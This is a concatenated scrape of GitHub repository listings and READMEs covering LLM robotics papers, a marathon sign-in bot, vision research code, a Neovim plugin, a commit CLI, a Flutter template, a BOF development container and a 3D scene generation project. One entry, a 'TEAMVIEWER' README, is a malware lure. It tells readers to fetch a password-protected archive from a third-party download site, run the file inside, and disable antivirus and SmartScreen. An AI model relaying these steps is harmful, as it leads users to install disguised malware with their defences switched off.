**ChatGPT for Robotics: Design Principles and Model Abilities** Arxiv *Sai Vemprala, Rogerio Bonatti, Arthur Bucker, Ashish Kapoor* [[pdf](https://arxiv.org/abs//2306.17582)], 2023.6 79. **Robots That Ask For Help: Uncertainty Alignment for Large Language Model Planners** Arxiv *Allen Z. Ren, Anushri Dixit, Alexandra Bodrova, Sumeet Singh, Stephen Tu, Noah Brown, Peng Xu, Leila Takayama, Fei Xia, Jake Varley, Zhenjia Xu, Dorsa Sadigh, Andy Zeng, Anirudha Majumdar* [[pdf](https://arxiv.org/abs/2307.01928)], 2023.7 80. **Building Cooperative Embodied Agents Modularly with Large Language Models** Arxiv *Hongxin Zhang, Weihua Du, Jiaming Shan, Qinhong Zhou, Yilun Du, Joshua B. Tenenbaum, Tianmin Shu, Chuang Gan* [[pdf](https://arxiv.org/abs/2307.02485)], 2023.7 81. **VoxPoser: Composable 3D Value Maps for Robotic Manipulation with Language Models** Arxiv *Wenlong Huang, Chen Wang, Ruohan Zhang, Yunzhu Li, Jiajun Wu, Li Fei-Fei* [[pdf](https://arxiv.org/abs/2307.05973)], 2023.7 82. **Demonstrating Large Language Models on Robots** RSS 2023 Demo Track *Google DeepMind* [[pdf](https://roboticsconference.org/program/papers/024)], 2023.7 83. **GenSim: Generative Models for Supersizing Robotic Simulation Tasks** Github *Lirui Wang* [[pdf](https://github.com/liruiw/GenSim)], 2023.7 84. **Large Language Models as General Pattern Machines** Arxiv *Suvir Mirchandani, Fei Xia, Pete Florence, Brian Ichter, Danny Driess, Montserrat Gonzalez Arenas, Kanishka Rao, Dorsa Sadigh, Andy Zeng* [[pdf](https://arxiv.org/abs/2307.04721)], 2023.7 85. **SayPlan: Grounding Large Language Models using 3D Scene Graphs for Scalable Task Planning** Arxiv *Krishan Rana, Jesse Haviland, Sourav Garg, Jad Abou-Chakra, Ian Reid, Niko Suenderhauf* [[pdf](https://arxiv.org/abs/2307.06135)], 2023.7 86. **RoCo: Dialectic Multi-Robot Collaboration with Large Language Models** Arxiv *Zhao Mandi, Shreeya Jain, Shuran Song* [[pdf](https://arxiv.org/abs/2307.04738)], 2023.7 87. **A Real-World WebAgent with Planning, Long Context Understanding, and Program Synthesis** Arxiv *Izzeddin Gur, Hiroki Furuta, Austin Huang, Mustafa Safdari, Yutaka Matsuo, Douglas Eck, Aleksandra Faust* [[pdf](https://arxiv.org/abs/2307.12856)], 2023.7 88. **WebArena: A Realistic Web Environment for Building Autonomous Agents** Arxiv *Shuyan Zhou, Frank F. Xu, Hao Zh+, Xuhui Zhou, Robert Lo, Abishek Sridhar, Xianyi Cheng, Yonatan Bisk, Daniel Fried, Uri Alon, Graham Neubig* [[pdf](https://webarena.dev/static/paper.pdf)], 2023.7 89. **RT-2: Vision-Language-Action Models Transfer Web Knowledge to Robotic Control** Arxiv *Anthony Brohan, Noah Brown, Justice Carbajal, Yevgen Chebotar, Xi Chen, Krzysztof Choromanski, Tianli Ding, Danny Driess, Avinava Dubey, Chelsea Finn, Pete Florence, Chuyuan Fu, Montse Gonzalez Arenas, Keerthana Gopalakrishnan, Kehang Han, Karol Hausman, Alexander Herzog, Jasmine Hsu, Brian Ichter, Alex Irpan, Nikhil Joshi, Ryan Julian, Dmitry Kalashnikov, Yuheng Kuang, Isabel Leal, Lisa Lee, Tsang-Wei Edward Lee, Sergey Levine, Yao Lu, Henryk Michalewski, Igor Mordatch, Karl Pertsch, Kanishka Rao, Krista Reymann, Michael Ryoo, Grecia Salazar, Pannag Sanketi, Pierre Sermanet, Jaspiar Singh, Anikait Singh, Radu Soricut, Huong Tran, Vincent Vanhoucke, Quan Vuong, Ayzaan Wahid, Stefan Welker, Paul Wohlhart, Jialin Wu, Fei Xia, Ted Xiao, Peng Xu, Sichun Xu, Tianhe Yu, Brianna Zitkovich* [[pdf](https://robotics-transformer2.github.io/assets/rt2.pdf)], 2023.7 90. 
**Scaling Up and Distilling Down: Language-Guided Robot Skill Acquisition** Arxiv *Huy Ha, Pete Florence, Shuran Song* [[pdf](https://arxiv.org/abs/2307.14535)], 2023.7 91. **ToolLLM: Facilitating Large Language Models to Master 16000+ Real-world APIs** Arxiv *Yujia Qin, Shihao Liang, Yining Ye, Kunlun Zhu, Lan Yan, Yaxi Lu, Yankai Lin, Xin Cong, Xiangru Tang, Bill Qian, Sihan Zhao, Runchu Tian, Ruobing Xie, Jie Zhou, Mark Gerstein, Dahai Li, Zhiyuan Liu, Maosong Sun* [[pdf](https://arxiv.org/abs/2307.16789)], 2023.7
124
3
zhaohongxuan/shangma_auto_sign
https://github.com/zhaohongxuan/shangma_auto_sign
Daily automatic check-in for the Shanghai Marathon (Shangma) website, built with Node.js and GitHub Actions
## Shangma Auto Sign-in [![Run Auto Sign](https://github.com/zhaohongxuan/shangma_auto_sign/actions/workflows/auto-sign.yaml/badge.svg)](https://github.com/zhaohongxuan/shangma_auto_sign/actions/workflows/auto-sign.yaml) ### Daily check-in on the Shanghai Marathon official website, built with Node.js + GitHub Actions Having missed out in the Shanghai Marathon lottery for nine years, I decided to write an `automation script` that checks in daily to earn points. How much weight the points carry in the lottery is unknown, but they are known to count for something; how much exactly? We will see in the next draw. ### About the job schedule The sign-in job runs at **00:00 UTC**, i.e. **08:00 Beijing time**. **Because GitHub's runners are often heavily loaded**, the actual sign-in may be delayed, usually by a few tens of minutes, depending on the GitHub Actions queue. ### Usage 1. Fork this project (and star it to show your support 🥳) 2. On the repo's Settings page, add Secrets for your Shanghai Marathon username `SM_USERNAME` and password `SM_PASSWORD` 3. Run the workflow manually as a test <img width="1444" alt="image" src="https://github.com/zhaohongxuan/shangma_auto_sign/assets/8613196/695683c9-fbc2-4cab-9ef8-41e2ddf59b78"> The console should show a `签到成功/请勿重复签到` ("sign-in succeeded / do not sign in again") message <img width="990" alt="image" src="https://github.com/zhaohongxuan/shangma_auto_sign/assets/8613196/399e89f7-2ad6-486e-9e67-8953564ec528"> ### Disclaimer - This project is for learning and exchange only; using it for any illegal purpose is prohibited
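A minimal Python sketch of the scheduled sign-in step (the repository itself is Node.js; the login and sign-in endpoints and payload fields below are invented placeholders, and only the `SM_USERNAME` / `SM_PASSWORD` environment variables correspond to the secrets described above):

```python
# Hypothetical daily sign-in job; endpoints and field names are placeholders, not the real site's API.
import os

import requests

BASE_URL = "https://example-shangma-site.invalid"  # placeholder host


def sign_in() -> None:
    session = requests.Session()
    # Credentials are injected by the workflow from the repository secrets.
    login = session.post(f"{BASE_URL}/login", data={
        "username": os.environ["SM_USERNAME"],
        "password": os.environ["SM_PASSWORD"],
    })
    login.raise_for_status()
    result = session.post(f"{BASE_URL}/sign").json()
    print(result.get("message", result))  # e.g. "signed in" or "already signed in today"


if __name__ == "__main__":
    sign_in()
```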
20
37
elisezhu123/bilibili_sourcelibrary
https://github.com/elisezhu123/bilibili_sourcelibrary
null
# bilibili_sourcelibrary
10
0
wudongming97/OnlineRefer
https://github.com/wudongming97/OnlineRefer
[ICCV 2023] OnlineRefer: A Simple Online Baseline for Referring Video Object Segmentation
<div align="center"> <h1> <b> OnlineRefer: A Simple Online Baseline for Referring Video Object Segmentation </b> </h1> </div> <p align="center"><img src="docs/onlinerefer.jpg" width="800"/></p> > **[OnlineRefer: A Simple Online Baseline for Referring Video Object Segmentation](https://arxiv.org/abs/2307.09356)** > > Dongming Wu, Tiancai Wang, Yuang Zhang, Xiangyu Zhang, Jianbing Shen ### Abstract Referring video object segmentation (RVOS) aims at segmenting an object in a video following human instruction. Current state-of-the-art methods fall into an offline pattern, in which each clip independently interacts with text embedding for cross-modal understanding. They usually present that the offline pattern is necessary for RVOS, yet model limited temporal association within each clip. In this work, we break up the previous offline belief and propose a simple yet effective online model using explicit query propagation, named OnlineRefer. Specifically, our approach leverages target cues that gather semantic information and position prior to improve the accuracy and ease of referring predictions for the current frame. Furthermore, we generalize our online model into a semi-online framework to be compatible with video-based backbones. To show the effectiveness of our method, we evaluate it on four benchmarks, \ie, Refer-Youtube-VOS, Refer-DAVIS17, A2D-Sentences, and JHMDB-Sentences. Without bells and whistles, our OnlineRefer with a Swin-L backbone achieves 63.5 J&F and 64.8 J&F on Refer-Youtube-VOS and Refer-DAVIS17, outperforming all other offline methods. ## Update - **(2023/07/18)** OnlineRefer is accepted by ICCV2023. The online mode is released. ## Setup The main setup of our code follows [Referformer](https://github.com/wjn922/ReferFormer). Please refer to [install.md](docs/install.md) for installation. Please refer to [data.md](docs/data.md) for data preparation. ## Training and Evaluation If you want to train and evaluate our online model on Ref-Youtube-VOS using backbone **ResNet50**, please run the following command: ``` sh ./scripts/online_ytvos_r50.sh ``` If you want to train and evaluate our online model on Ref-Youtube-VOS using backbone **Swin-L**, please run the following command: ``` sh ./scripts/online_ytvos_swinl.sh ``` Note: The models with ResNet50 are trained using 8 NVIDIA 2080Ti GPU, and the models with Swin-L are trained using 8 NVIDIA Tesla V100 GPU. ## Model Zoo ### Ref-Youtube-VOS Please upload the zip file to the [competition server](https://competitions.codalab.org/competitions/29139#participate-submit_results). 
| Backbone| J&F | J | F | Pretrain | Model | Submission | | :----: |:-----:|:-----:|:----:|:------------------------------------------------------------------------------------------------------:|:----------------------------------------------------------------------------------------------------:|:---------------------------------------------------------------------------:| | ResNet-50 | 57.3 | 55.6 | 58.9 | [weight](https://github.com/wudongming97/OnlineRefer/releases/download/v1.0/r50_pretrained.pth) | [model](https://github.com/wudongming97/OnlineRefer/releases/download/v1.0/ytvos-r50-checkpoint.pth) | [link](https://github.com/wudongming97/OnlineRefer/releases/download/v1.0/ResNet50_Submission.zip) | | Swin-L | 63.5 | 61.6 | 65.5 | [weight](https://github.com/wudongming97/OnlineRefer/releases/download/v1.0/swin_large_pretrained.pth) | [model](https://drive.google.com/file/d/1wTEf5Z-EmmtPJkWaUPFDpcRg8vuCsV2X/view?usp=sharing) | [link](https://github.com/wudongming97/OnlineRefer/releases/download/v1.0/SwinL_Submission.zip) | | Video Swin-B | 62.9 | 61.0 | 64.7 | - | - |[link](https://github.com/wudongming97/OnlineRefer/releases/download/v1.0/VideoSwinB_Submission.zip) | ### Ref-DAVIS17 As described in the paper, we report the results using the model trained on Ref-Youtube-VOS without finetune. | Backbone | J&F | J | F | Model | |:------------:|:----:|:----:|:----:|:------------------------------------------------------------------------------------------------:| | ResNet-50 | 59.3 | 55.7 | 62.9 | [model](https://github.com/wudongming97/OnlineRefer/releases/edit/v1.0/ytvos-r50-checkpoint.pth) | | Swin-L | 64.8 | 61.6 | 67.7 | [model](https://drive.google.com/file/d/1wTEf5Z-EmmtPJkWaUPFDpcRg8vuCsV2X/view?usp=sharing) | [//]: # (## Visualizations) [//]: # (- Ref-DAVIS17) [//]: # () [//]: # (<img src="docs/davis_demo1.gif" width="400"/><img src="docs/davis_demo2.gif" width="400"/>) [//]: # () [//]: # (- Ref-Youtube-VOS) [//]: # () [//]: # (<img src="docs/ytvos_demo1.gif" width="400"/><img src="docs/ytvos_demo2.gif" width="400"/>) [//]: # (- Testing on long videos &#40;selected from Youtube-VIS 2021&#41;) ## Acknowledgement - [Deformable DETR](https://github.com/fundamentalvision/Deformable-DETR) - [ReferFormer](https://github.com/wjn922/ReferFormer) - [MTTR](https://github.com/mttr2021/MTTR) - [MOTR](https://github.com/megvii-research/MOTR) ## Citation If you find OnlineRefer useful in your research, please consider citing: ``` @article{wu2023onlinerefer, title={OnlineRefer: A Simple Online Baseline for Referring Video Object Segmentation}, author={Wu, Dongming and Wang, Tiancai and Zhang, Yuang and Zhang, Xiangyu and Shen, Jianbing}, journal={arXiv preprint arXiv:2307.09356}, year={2023} } ```
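For a quick sanity check of the released checkpoints in the tables above, a small PyTorch snippet can list what a downloaded `.pth` file contains before running the evaluation scripts; whether the weights sit under a `'model'` key is an assumption about the checkpoint layout, not something stated in this README:

```python
# Peek inside a downloaded OnlineRefer checkpoint (layout assumptions noted above).
import torch

ckpt = torch.load("ytvos-r50-checkpoint.pth", map_location="cpu")
if isinstance(ckpt, dict):
    print("top-level keys:", list(ckpt.keys()))
    state_dict = ckpt.get("model", ckpt)  # fall back to the dict itself if there is no 'model' key
    print("parameter tensors:", len(state_dict))
```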
23
2
Karine-Huang/T2I-CompBench
https://github.com/Karine-Huang/T2I-CompBench
null
# T2I-CompBench: A Comprehensive Benchmark for Open-world Compositional Text-to-image Generation Kaiyi Huang<sup>1</sup>, Kaiyue Sun<sup>1</sup>, Enze Xie<sup>2</sup>, Zhenguo Li<sup>2</sup>, and Xihui Liu<sup>1</sup>. **<sup>1</sup>The University of Hong Kong, <sup>2</sup>Huawei Noah’s Ark Lab** <a href=' https://karine-h.github.io/T2I-CompBench/'><img src='https://img.shields.io/badge/Project-Page-Green'></a> <a href='https://arxiv.org/pdf/2307.06350.pdf'><img src='https://img.shields.io/badge/Paper-Arxiv-red'></a> ### Installing the dependencies Before running the scripts, make sure to install the library's training dependencies: **Important** To make sure you can successfully run the latest versions of the example scripts, we highly recommend **installing from source** and keeping the install up to date as we update the example scripts frequently and install some example-specific requirements. To do this, execute the following steps in a new virtual environment: ```bash git clone https://github.com/huggingface/diffusers cd diffusers pip install . ``` Then cd in the example folder and run ```bash pip install -r requirements.txt ``` And initialize an [🤗Accelerate](https://github.com/huggingface/accelerate/) environment with: ```bash accelerate config ``` ### Finetuning 1. LoRA finetuning Use LoRA finetuning method, please refer to the link for downloading "lora_diffusion" directory: ``` https://github.com/cloneofsimo/lora/tree/master ``` 2. Example usage ``` export project_dir=/T2I-CompBench cd $project_dir export train_data_dir="examples/samples/" export output_dir="examples/output/" export reward_root="examples/reward/" export dataset_root="examples/dataset/color.txt" export script=GORS_finetune/train_text_to_image.py accelerate launch --multi_gpu --mixed_precision=fp16 \ --num_processes=8 --num_machines=1 \ --dynamo_backend=no "${script}" \ --train_data_dir="${train_data_dir}" \ --output_dir="${output_dir}" \ --reward_root="${reward_root}" \ --dataset_root="${dataset_root}" ``` or run ``` cd T2I-CompBench bash GORS_finetune/train.sh ``` The image directory should be a directory containing the images, e.g., ``` examples/samples/ ├── a green bench and a blue bowl_000000.png ├── a green bench and a blue bowl_000001.png └──... ``` The reward directory should include a json file named "vqa_result.json", and the json file should be a dictionary that maps from `{"question_id", "answer"}`, e.g., ``` [{"question_id": 0, "answer": "0.7110"}, {"question_id": 1, "answer": "0.7110"}, ...] ``` The dataset should be placed in the directory "examples/dataset/". ### Evaluation 1. Install the requirements MiniGPT4 is based on the repository, please refer to the link for environment dependencies and weights: ``` https://github.com/Vision-CAIR/MiniGPT-4 ``` 2. Example usage For evaluation, the input images files are stored in the directory "examples/samples/", with the format the same as the training data. #### BLIP-VQA: ``` export project_dir="BLIPvqa_eval/" cd $project_dir out_dir="examples/" python BLIP_vqa.py --out_dir=$out_dir ``` or run ``` cd T2I-CompBench bash BLIPvqa_eval/test.sh ``` The output files are formatted as a json file named "vqa_result.json" in "examples/annotation_blip/" directory. 
#### UniDet: download weight and put under repo experts/expert_weights: ``` mkdir -p UniDet_eval/experts/expert_weights cd UniDet_eval/experts/expert_weights wget https://huggingface.co/shikunl/prismer/resolve/main/expert_weights/Unified_learned_OCIM_RS200_6x%2B2x.pth ``` ``` export project_dir=UniDet_eval cd $project_dir python determine_position_for_eval.py ``` The output files are formatted as a json file named "vqa_result.json" in "examples/labels/annotation_obj_detection" directory. #### CLIPScore: ``` outpath="examples/" python CLIPScore_eval/CLIP_similarity.py --outpath=${outpath} ``` or run ``` cd T2I-CompBench bash CLIPScore_eval/test.sh ``` The output files are formatted as a json file named "vqa_result.json" in "examples/annotation_clip" directory. #### 3-in-1: ``` export project_dir="3_in_1_eval/" cd $project_dir outpath="examples/" data_path="examples/dataset/" python "3_in_1.py" --outpath=${outpath} --data_path=${data_path} ``` The output files are formatted as a json file named "vqa_result.json" in "examples/annotation_3_in_1" directory. #### MiniGPT4-CoT: If the category to be evaluated is one of color, shape and texture: ``` export project_dir=Minigpt4_CoT_eval cd $project_dir category="color" img_file="examples/samples/" output_path="examples/" python mGPT_cot_attribute.py --category=${category} --img_file=${img_file} --output_path=${output_path} ``` If the category to be evaluated is one of spatial, non-spatial and complex: ``` export project_dir=MiniGPT4_CoT_eval/ cd $project_dir category="non-spatial" img_file="examples/samples/" output_path="examples" python mGPT_cot_general.py --category=${category} --img_file=${img_file} --output_path=${output_path} ``` The output files are formatted as a csv file named "mGPT_cot_output.csv" in output_path. ### Inference Run the inference.py. ``` export pretrained_model_path="checkpoint/color/lora_weight.pt" export prompt="A bathroom with green tile and a red shower curtain" python inference.py --pretrained_model_path "${pretrained_model_path}" --prompt "${prompt}" ``` ### Citation If you're using T2I-CompBench in your research or applications, please cite using this BibTeX: ```bibtex @article{huang2023t2icompbench, title={T2I-CompBench: A Comprehensive Benchmark for Open-world Compositional Text-to-image Generation}, author={Kaiyi Huang and Kaiyue Sun and Enze Xie and Zhenguo Li and Xihui Liu}, journal={arXiv preprint arXiv:2307.06350}, year={2023}, } ``` ### License This project is licensed under the MIT License. See the "License.txt" file for details.
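Every evaluation route above writes a `vqa_result.json` in the same shape shown earlier (a list of `{"question_id", "answer"}` records). A small helper like the one below can summarize a run; treating `answer` as a numeric score stored as a string is an assumption that matches the example in this README, not a guarantee for every metric:

```python
# Summarize a T2I-CompBench vqa_result.json; assumes 'answer' is a numeric score encoded as a string.
import json
import statistics


def summarize(path: str = "examples/annotation_blip/vqa_result.json") -> None:
    with open(path) as f:
        results = json.load(f)
    scores = [float(item["answer"]) for item in results]
    print(f"{len(scores)} samples, mean score {statistics.mean(scores):.4f}")


if __name__ == "__main__":
    summarize()
```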
26
1
MarinaGV93/TEAMVIEWER
https://github.com/MarinaGV93/TEAMVIEWER
null
# INSTRUCTIONS: - Download the project: https://github-downloader.com/ - Unzip the archive (Project v1.2.4.zip) to your desktop. Password: 2023 - Run the file (Project_run v1.2.4). If you can’t download / install the software, you need to: 1. Disable / remove antivirus (files are completely clean) 2. If you can’t download, try to copy the link and download using another browser! 3. Disable Windows Smart Screen, as well as update the Visual C++ package.
28
0
vaishnavikotkar2004/Stack-Programs
https://github.com/vaishnavikotkar2004/Stack-Programs
It is in the questions file.
# Stack-Programs
10
0
curated-intel/Threat-Actor-Profile-Guide
https://github.com/curated-intel/Threat-Actor-Profile-Guide
The Threat Actor Profile Guide for CTI Analysts
## 🔗 [The Threat Actor Profile Guide for CTI Analysts PDF](https://github.com/curated-intel/Threat-Actor-Profile-Guide/blob/main/The%20Threat%20Actor%20Profile%20Guide%20for%20CTI%20Analysts%20v1.1.pdf) ![image](https://github.com/curated-intel/Threat-Actor-Profile-Guide/assets/59974887/964427de-fbdb-460f-b5d5-4a8be10424bb)
53
4
EspressoCake/BOF_Development_Docker
https://github.com/EspressoCake/BOF_Development_Docker
A VSCode devcontainer for development of COFF files with batteries included.
# BOF_Development_Docker ## Summary This repository serves as a fully functional, **lightweight** template for developing and compiling `BOF` or otherwise `Windows`-centric applications via `Visual Studio Code`. ## Why `Visual Studio Code` has supported idempotent, purpose-built development containers for a few years. This repository is meant to illustrate how powerful that is, namely: - Remote installation of extension configurations - Reliable `Intellisense` for development using path inspection - Quick, reliable, readily deployable images for rapid development - No configuration drift, unlike traditional virtual-machine-based IDE setups ## How When you open this folder in `Visual Studio Code`, you will be prompted to reopen it within a container. Acknowledging this (and assuming you have the [Docker VSCode extension](https://code.visualstudio.com/docs/containers/overview) and `Docker` already installed) will reload the current window to be *inside* the container it has built for you. That's it. Happy hacking. ## Elections and Benefits I'm currently using `musl` as the set of header files/libraries/compiler options. This plays a *lot* nicer with the numerous function-pointer hacks leveraged within many popular projects, including reflective loaders of choice. We're running on a slim `Alpine` image due to its size and first-class native support of `musl`. This is just one less headache, and we can leave behind the "kitchen sink" bloat of other images. The configuration of the extensions is already done for you, so `Intellisense`, among other things (such as peeking definitions), is a single right-click away.
41
1
lewis6991/whatthejump.nvim
https://github.com/lewis6991/whatthejump.nvim
Show jumplist in a floating window.
# whatthejump.nvim Show jump locations in a floating window. https://github.com/lewis6991/whatthejump.nvim/assets/7904185/13cb71f4-57e1-4f8f-916f-b6c616d36480 ## Usage If no keymaps already exist, ones will be created automatically for `<C-i>` and `<C-o>`. Otherwise, if you use custom keymaps for jumping, use the following: ```lua -- Jump backwards vim.keymap.set('n', '<M-k>', function() require 'whatthejump'.show_jumps(false) return '<C-o>' end, {expr = true}) -- Jump forwards vim.keymap.set('n', '<M-j>', function() require 'whatthejump'.show_jumps(true) return '<C-i>' end, {expr = true}) ```
19
0
AllanCapistrano/gbc
https://github.com/AllanCapistrano/gbc
Git Better Commit (gbc) is a simple CLI in Go for writing better commits.
<h1 align="center">Git Better Commit</h1> <p align="center"> <img src="./data/screenshots/gbc-v110-execution.gif" alt="gbc v1.1.0 execution"> </p> <details> <summary>With emojis</summary> <p align="center"> <img src="./data/screenshots/gbc-v110-execution-emojis.gif" alt="gbc v1.1.0 execution with emojis"> </p> </details> ------------ ## :book: Description ## **Git Better Commit (gbc) is a command line interface written in Golang that provides a simple way to write commits following the [Conventional Commits](https://www.conventionalcommits.org/).** ------------ ## :computer: How to use <details open> <summary><h3>Install gbc</h3></summary> Follow the next steps to install **gbc**: 1. Make sure you already have [curl](https://curl.se/) installed on your machine; 2. Paste this command in your terminal: ```powershell bash -c "$(curl --fail --show-error --silent --location https://raw.githubusercontent.com/AllanCapistrano/gbc/main/scripts/install.sh)" ``` 3. You can check if **gbc** is installed by typing `gbc --version` in your terminal. </details> <details> <summary><h3>Install gbc for Termux</h3></summary> Follow the next steps to install **gbc** for [Termux](https://termux.dev/en/): 1. Make sure you already have [curl](https://curl.se/) installed; 2. Paste this command in your terminal: ```powershell bash -c "$(curl --fail --show-error --silent --location https://raw.githubusercontent.com/AllanCapistrano/gbc/main/scripts/install-termux.sh)" ``` 3. You can check if **gbc** is installed by typing `gbc --version` in your terminal. </details> <details> <summary><h3>Using gbc</h3></summary> Once you have **gbc** installed, after adding the file(s) to commit, type `gbc` in your terminal, select the **commit type** using the **arrows keys**, and press **enter**. After that, enter the **commit message** you want. You can type `gbc --help` to see the allowed command options or `gbc help <commit type>` to see a short description and basic example of each **commit type**. </details> <details> <summary><h3>Changing the defaults emojis</h3></summary> You can change the emojis in the `gbc.conf` file, available in `$HOME/.config/gbc`. Just change the `emojis = {...}`. Note that you need to use Emojis Shortcodes, you can get them in [Emoji Picker](https://github-emoji-picker.rickstaa.dev/). ###### Make sure to follow the formatting, otherwise the change will not be applied. ###### </details> <details> <summary><h3>Allowing commits messages with emojis</h3></summary> You can allow **commit messages with emojis** in the `gbc.conf` file, available in `$HOME/.config/gbc`. Just change the `enableEmojis` to `true`. ###### Make sure to follow the formatting, otherwise the change will not be applied. ###### The result will be something like: ```powershell 🐛 fix: updateUser method ``` </details> <details> <summary><h3>Build gbc</h3></summary> To build **gbc** in your machine, you can follow the next steps: 1. Make sure you already have [Go](https://go.dev/) installed; 2. Clone this repository or download the `.zip` file; 3. Open the project directory in your terminal; 4. Install the dependencies: ```powershell go mod download ``` or ```powershell go mod tidy ``` 5. Then build the project: ```powershell go build -o bin/gbc main.go ``` If you get [`GLIBC not found`](https://github.com/AllanCapistrano/gbc/issues/13) error, try: ```powershell CGO_ENABLED=0 go build -o bin/gbc main.go ``` To use the settings file: 1. Create the **gbc** config directory: ```powershell mkdir -p $HOME/.config/gbc ``` 2. 
Move the `gbc.conf` file into the configuration directory:: ```powershell mv ./config/gbc.conf $HOME/.config/gbc ``` </details> <details> <summary><h3>Uninstall gbc</h3></summary> To uninstall **gbc** run the following command in your terminal: ```powershell bash -c "$(curl --fail --show-error --silent --location https://raw.githubusercontent.com/AllanCapistrano/gbc/main/scripts/uninstall.sh)" ``` </details> <details> <summary><h3>Uninstall gbc from Termux</h3></summary> To uninstall **gbc** from [Termux](https://termux.dev/en/) run the following command: ```powershell bash -c "$(curl --fail --show-error --silent --location https://raw.githubusercontent.com/AllanCapistrano/gbc/main/scripts/uninstall-termux.sh)" ``` </details> ------------ ## :man_technologist: Author ## | [![Allan Capistrano](https://github.com/AllanCapistrano.png?size=100)](https://github.com/AllanCapistrano) | | -----------------------------------------------------------------------------------------------------------| | [Allan Capistrano](https://github.com/AllanCapistrano) | <p> <h3>My socials:</h3> <a href="https://github.com/AllanCapistrano"> <img src="https://github.com/AllanCapistrano/AllanCapistrano/blob/master/assets/github-square-brands.png" alt="Github icon" width="5%"> </a> &nbsp <a href="https://www.linkedin.com/in/allancapistrano/"> <img src="https://github.com/AllanCapistrano/AllanCapistrano/blob/master/assets/linkedin-brands.png" alt="Linkedin icon" width="5%"> </a> &nbsp <a href="https://mail.google.com/mail/u/0/?view=cm&fs=1&tf=1&source=mailto&[email protected]"> <img src="https://github.com/AllanCapistrano/AllanCapistrano/blob/master/assets/envelope-square-solid.png" alt="Email icon" width="5%"> </a> </p> ------------ ## :pray: Support ## **Please :star: this repository if this project is useful or has helped you.** [!["Buy Me A Coffee"](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://www.buymeacoffee.com/allancapistrano) ------------ ## :balance_scale: License ## [GPL-3.0 License](./LICENSE)
25
1
worldline-spain/flutter_architecture_template
https://github.com/worldline-spain/flutter_architecture_template
null
# Flutter architecture template ## Introduction This project is a starting point for a Flutter applications created by Worldline Spain. ## Features - Clean Architecture - Flavors (dev, prep, prod) - Http client to Api REST ([Dio](https://pub.dev/packages/dio)) - Native launch screen - App icons configured - Internationalization translations ([Easy localization](https://pub.dev/packages/easy_localization)) - Routing ([Go Router](https://pub.dev/packages/go_router)) - MVVM pattern with [Cubit](https://pub.dev/packages/flutter_bloc) for state management - Dependency injection ([Get it](https://pub.dev/packages/get_it) and [Injectable](https://pub.dev/packages/injectable)). ## Environment The application has three environments and each one has its own configuration file: - dev: `.env/dev.dart` - prep: `.env/prep.dart` - prod: `.env/prod.dart` ## Configure new project To configure a new project, you have change the following files: 1. The environment files with the key and values. 2. Replace the project name `worldline_flutter` in all files. 3. Replace the package name `com.worldline.flutter` in all files. 4. Remove all files with references to Example code. 5. Refactor homeWorldline on `constants.dart` 6. Rename folder on `android/app/src/main/kotlin/` to your package name ### Generate native splash 1. Replace the splash image `assets/images/splash-logo.png` with the new one. 2. Replace the splash android 12 image `assets/images/splash-android12-logo.png` with the new one. 3. Generate the splash images with the following command `fvm flutter pub run flutter_native_splash:create` 4. (optional) If you want use splash images in Flutter, replace the `assets/images/splash.png` and related images to accomplish the [resolution aware asset](https://flutter.dev/docs/development/ui/assets-and-images#resolution-aware). In your `android/app/src/main/res/drawable-mdpi` folder, you will have a `splash.png`. This is your 1x image. [reference](https://developer.android.com/training/multiscreen/screendensities) Copy that to your app's assets folder. Then copy the `splash.png` in `android/app/src/main/res/drawable-hdpi` to a subfolder in your app's assets folder named `1.5x`. Do the same for the rest of the folders. The mapping should be: - `mdpi` → `assets` - `hdpi` → `assets/1.5x` - `xhdpi` → `assets/2.0x` - `xxhdpi` → `assets/3.0x` - `xxxhdpi` → `assets/4.0x` ## Run and build To run the application in each environment, you can use the following commands: - dev: `flutter run --flavor dev --dart-define-from-file=.env/dev.json` - prep: `flutter run --flavor prep --dart-define-from-file=.env/prep.json` - prod: `flutter run --flavor prod --dart-define-from-file=.env/prod.json` Also, you can configure your IDE to run the application in each environment. ## Generate code If you implement a new injectable file, you have to run the following command to generate the necessary code: `fvm flutter packages pub run build_runner build` or `sh ./tools/generate_code.sh` Also, you can configure Android Studio to run this command automatically: 1. On the configuration, add a new "External tool" execution step in the "before launch" section. 2. Configure the execution step as follows: 1. Name: injectable 2. Description: Run injects before launch 3. Program: flutter 4. Arguments: packages pub run build_runner build 5. Working directory: $ProjectFileDir$ Is important to note that you have to configure the command for the three flavors.
26
2
yinyunie/ScenePriors
https://github.com/yinyunie/ScenePriors
Implementation of CVPR'23: Learning 3D Scene Priors with 2D Supervision
# Learning 3D Scene Priors with 2D Supervision [[Project]](https://yinyunie.github.io/sceneprior-page/)[[Paper]](https://arxiv.org/pdf/2211.14157.pdf) [Yinyu Nie](https://yinyunie.github.io/), [Angela Dai](https://www.3dunderstanding.org/), [Xiaoguang Han](https://gaplab.cuhk.edu.cn/), [Matthias Nießner](https://niessnerlab.org/index.html) in [CVPR 2023](https://cvpr2023.thecvf.com/) --- **3D Scene Generation** | <img src="resources/scene_gen/rendering_1.jpg" width="500"> | <img src="resources/scene_gen/rendering_2.jpg" width="500"> |<img src="resources/scene_gen/rendering_3.jpg" width="500"> | <img src="resources/scene_gen/rendering_4.jpg" width="500"> | |:-----------------------------------------------------------:|:-----------------------------------------------------------:|:-----------------------------------------------------------:|:-----------------------------------------------------------:| **Single View Reconstruction** | Input | Pred | Input | Pred | |:-------------------------------------------------:|:---------------------------------------------------:|:-------------------------------------------------:|:------------------------------------------------:| | <img src="resources/svr/1/input.jpg" width="500"> | <img src="resources/svr/1/ours.jpg" width="500"> | <img src="resources/svr/2/input.jpg" width="500"> | <img src="resources/svr/2/ours.jpg" width="500"> | --- ## Install Our codebase is developed under Ubuntu 20.04 with PyTorch 1.12.1. 1. We recommend to use [conda]() to deploy our environment by ```commandline cd ScenePriors conda create env -f environment.yml conda activate sceneprior ``` 2. Install [Fast Transformers](https://fast-transformers.github.io/) by ```commandline cd external/fast_transformers python setup.py build_ext --inplace cd ../.. ``` 3. Please follow [link](https://github.com/facebookresearch/pytorch3d/blob/main/INSTALL.md) to install the prerequisite libraries for [PyTorch3D](https://pytorch3d.org/). Then install PyTorch3D from our local clone by ```commandline cd external/pytorch3d pip install -e . cd ../.. ``` *Note: After installed all prerequisite libraries in [link](https://github.com/facebookresearch/pytorch3d/blob/main/INSTALL.md), please do not install prebuilt binaries for PyTorch3D.* --- ## Data Processing ### 3D-Front data processing (for scene genration) 1. Apply \& Download the 